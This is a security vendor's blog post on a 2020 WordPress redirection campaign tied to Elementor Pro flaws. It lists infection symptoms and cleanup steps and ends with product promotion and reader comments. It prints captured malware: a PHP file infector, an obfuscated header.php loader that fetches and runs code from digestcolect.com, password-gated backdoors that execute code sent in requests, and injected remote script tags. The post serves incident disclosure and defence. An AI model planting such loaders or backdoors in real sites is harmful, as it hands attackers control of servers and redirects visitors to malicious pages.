Plugin Exploit

Targeted Redirection Attacks to Digestcolect .com in WordPress Websites – Linked To Vulnerabilities in Elementor Pro

Updated on: May 30, 2020

Targeted Redirection Attacks  to Digestcolect .com in WordPress Websites – Linked To Vulnerabilities in Elementor Pro

Attacks targeting vulnerabilities in WordPress themes and plugins have only aggravated in the past few months. The already ongoing attack campaign on WordPress plugins – Elementor Pro, The Ultimate Addons of Elementor & Astra Theme seem to have taken a new turn with redirection hack campaigns surfacing redirecting users to questionable websites like digestcolect [.] com, track[.]developfirstline[.]com/t.js?s=5

Both Elementor and Ultimate Addons for Elementor have issued updates to patch these security issues, so please update to the following versions if not done already:

  • Elementor Pro: 2.9.4
  • Ultimate Addons for Elementor: 1.24.2

What We Know So Far….

One common symptom shown by the affected websites is – Redirection.

That said, there are other symptoms as well that hint at the attack:

  1. Gibberish files added in the website root directory
  2. Unauthenticated admin users added to the WordPress admin area
  3. Unknown files and folders in /wp-content/uploads/elementor/custom-icons/
  4. Unknown files in website root such as wp-xmlrpc.phpwp-cl-plugin.php
  5. Thousands of unknown malicious javascript & PHP files added to the file system
digestcolect redirection WordPress malware
Redirection Javascript insert tries being stopped by Astra’s firewall

What Does Malicious ‘tap.digestcolect.com/r.php?id=0 spam/’ Website Redirection Code Look Like?

digestcolect malware in WordPress websites
  • The following code was found under a file named ‘hjghjerg‘:
<?php $lastRunLog = "./debugs.log";
if (file_exists($lastRunLog)) {
    $lastRun = file_get_contents($lastRunLog);
    if (time() - $lastRun >= 6400) {
         search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
		 search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
         file_put_contents($lastRunLog, time());
    }
} else {
		search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
		search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
         file_put_contents( './debugs.log', time());
}
function search_file($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		@search_file( $dir,"index");
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		@search_file( $dir,"index");
		return;
	}
}

...

function search_file_js($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		@search_file_js( $dir,".js");
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		@search_file_js( $dir,".js");
		return;
	}
}
foreach($files as $key => $value){
    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
		make_it_js($path);
    } }else if($value != "." && $value != "..") {
        search_file_js($path, $file_to_search);
    }  
 } 
}
function make_it_js($f){
			$g = file_get_contents($f);
			if (strpos($g, 'var') !== false) {
										$g = file_get_contents($f);
if (strpos($g, 'mndfhghjf') !== false) {
} else {
$l2 = "";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'mndfhghjf') !== false) {
} 
}
			}
}
function make_it($f){
$g = file_get_contents($f);
if (strpos($g, 'trackstatisticsss') !== false) {
} else {
$l2 = "";
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'trackstatisticsss') !== false) {
} 
			}
}

Is your WordPress site hacked? We can help!

Astra has helped thousands of WordPress websites get rid of hack in no time.
  • This piece of code was found inside the file header.php:
<?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; 
$d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); 
$b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(99).chr(115).chr(115).chr(46).chr(100).chr(105).chr(103).chr(101).chr(115).chr(116).chr(99).chr(111).chr(108).chr(101).chr(99).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(109).chr(46).chr(116).chr(120).chr(116)));
$c1 = chr(104);
 @file_put_contents($c1,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($c1);@unlink($c1); ?><?php if(isset($_REQUEST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_REQUEST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).

..

chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; 	$z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); 	$z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); 	$z3 = $b2($_REQUEST[chr(100).chr(49)]); 	@$n3($a,$z2); 	@include($a);@unlink($a); 	$a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; @$n3($a,$z2); 	@include($a);@unlink($a);die();  } ?><?php if(isset($_GET[5]) && md5($_GET[5]) == "37147ec1ab66861d6e2ef8f672cb2c0b") {function _1896550334($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*","");return $a[$i];}  function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];if(3404<mt_rand(443,2956))session_get_cookie_params($_COOKIE,$_0,$_POST,$_0);}$_1=l__0(_1896550334(0)) .l__0(_1896550334(1)) .l__0(_1896550334(2)) .l__0(_1896550334(3));if(!empty($_1)){$_1=str_rot13(@pack(_1896550334(4),strrev($_1)));if(isset($_1)){$_2=create_function(_1896550334(5),$_1);$_2();exit();}}else{echo base64_decode("bG9jYWwtZXJyb3Itbm90LWZvdW5k");}die();} ?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>
  • This code was found in some core theme files:
<script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script>
Malicious digestcolect [.] com spam causing code flagged by Astra’s malware scanner

How to Fix the Digestcolect [.] com Redirect?

If your website is redirecting or showing other symptoms of the hack, you can quicken your incident response by doing the following:

  1. Start by checking favorite files that attract hackers like functions.php, wp-config.php & index.php
  2. Compare the core WordPress files with the one on your server to check if hackers might have infected core files
  3. Scan your website with an online malware scanner.
  4. Check the database for unfamiliar admins and users
  5. Check your root directory for gibberish files

You can follow our WordPress redirection removal guide for a more thorough malware removal or follow this step-by-step tutorial for the same.

If the redirection still persists, it is quite possible that hackers have also injected backdoors on your website. This usually requires an in-depth malware scan with code review to clean the website.

Not infected? Secure Your Website

Lucky that you dodged the exploit. But don’t play on chances. It’s better to secure your website now. A premium firewall like Astra Security goes a long way in securing your website with the 24×7 monitoring and protection from attacks like JS injection, SQLi, CSRF, XSS, Bad bots, RFI, LFI, and a hundred others.

How does the Astra Firewall work?

With a multitude of additional security tools such as Malware Scanner, Country Blocking, IP blocking, Astra security a cakewalk for businesses and blogs alike.

Need professional help to prevent WordPress site hacked?. Drop us a message on the chat widget, and we’d be happy to help you. Fix my Hacked WordPress website now.

Don’t take our words for it. See it for yourself!

Peek inside Astra

Was this post helpful?

Ananda Krishna

Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France).At Astra he's building an intelligent security ecosystem - web application firewall (WAF), malware detection & analysis, large scale SaaS applications, APIs & more. He's actively involved in the cybersecurity community and shared his knowledge at various forums & invited talks.
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

16 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
James D. Schreiber
James D. Schreiber
6 days ago

Hi can you tell me about wordpress backdoor hacks and how can I defend from happening this to me?

Sai Krishna
Editor
6 days ago

Hi James! A WordPress backdoor is the code which allows an attacker unauthorized and persistent access to the server. Often it is a malicious file hidden somewhere. Therefore, the threat could be from anywhere. Later on, it can be a time and resource consuming process to remove WordPress backdoors. For more info, visit here: https://www.getastra.com/blog/911/wordpress-backdoor-hack/

M. Ament
M. Ament
6 days ago

Hello, what features does the Astra firewall offers along with scanner for WordPress security, and can you provide more info on pricing and details?

Sai Krishna
Editor
6 days ago
Reply to  M. Ament

Hi Ament! Thanks for responding to the article. You can visit here for features and more information of Astra firewall: https://www.getastra.com/wordpress-firewall and for pricing visit here: https://www.getastra.com/pricing

Richard S
Richard S
6 days ago

Hi Astra, my WordPress website is showing some strange Japanese content on google search. Is my website hacked? If yes, how can i solve it?

Sai Krishna
Editor
6 days ago
Reply to  Richard S

Thanks for responding to the article. In a Japanese keyword hack, auto generated Japanese text starts to appear on your site. This particular Blackhat SEO technique hijacks Google search results by displaying Japanese words in the title and description of the infected pages. It happens when different web pages are shown to search engines and normal visitors. For more information on removal visit here: https://www.getastra.com/blog/911/japanese-keyword-hack/

Wysong
Wysong
6 days ago

Hello, how i can fix the redirection hack of WordPress? I have a site which is redirecting to strange websites and I want to fix it myself.

Sai Krishna
Editor
6 days ago
Reply to  Wysong

Hi Wysong! Thanks for responding to the article. A WordPress malware redirect hack is a common form of attack where the visitors to the infected website are automatically redirected to phishing sites or malicious websites. For more information visit here: https://www.getastra.com/blog/911/wordpress-redirect-hack/

B. Foster
B. Foster
6 days ago

Hi there, I have a query. Is there any chance that hackers upload files using a file manager that affects website performance?

Sai Krishna
Editor
6 days ago
Reply to  B. Foster

Hi Foster! Yes, Malicious file uploaders allow hackers to upload .php files etc to the server which could be used to further infect the site. The consequences could include complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement.

Paul M. Kelly
Paul M. Kelly
6 days ago

Hey, I think my database has some infected files. In which tables I can possibly find them? It’s a wordpress site.

Sai Krishna
Editor
6 days ago
Reply to  Paul M. Kelly

Hi Paul! Sorry to hear that. For any WordPress website, the database is the biggest asset. It stores all the crucial information of a website i.e. user info, site URLs, posts, pages, comments, custom fields, etc. An improperly secured WordPress database is like an open invitation to hackers. For more info, visit here: https://www.getastra.com/blog/911/how-to-secure-wordpress-database/

Catherine
Catherine
6 days ago

Hi there, can you tell me about those common files that have a high chance of getting hacked? I own a website running on WordPress.

Sai Krishna
Editor
6 days ago
Reply to  Catherine

Hi Catherine! Thanks for responding to the article. You can go through this article to know more info on common files that get hacked and how to protect the: https://www.getastra.com/blog/911/wordpress-files-hacked-wp-config-php-hack/

Miller K. Joe
Miller K. Joe
6 days ago

Hey can you tell me more about the features that Astra firewall comes with? I would like to know more before opting for it 🙂

Sai Krishna
Editor
6 days ago
Reply to  Miller K. Joe

Hi Miller! Thanks for responding to the article and also for showing interest in Astra. You don’t have to worry about any malware, credit card hack, SQLi, XSS, SEO Spam, comments spam, brute force & 100+ types of threats. This means you can get rid of other security plugins & let Astra take care of it all.You can know more info about features and other here: https://www.getastra.com/features

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include firewall, malware scanner and security audits to protect your site from the
evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany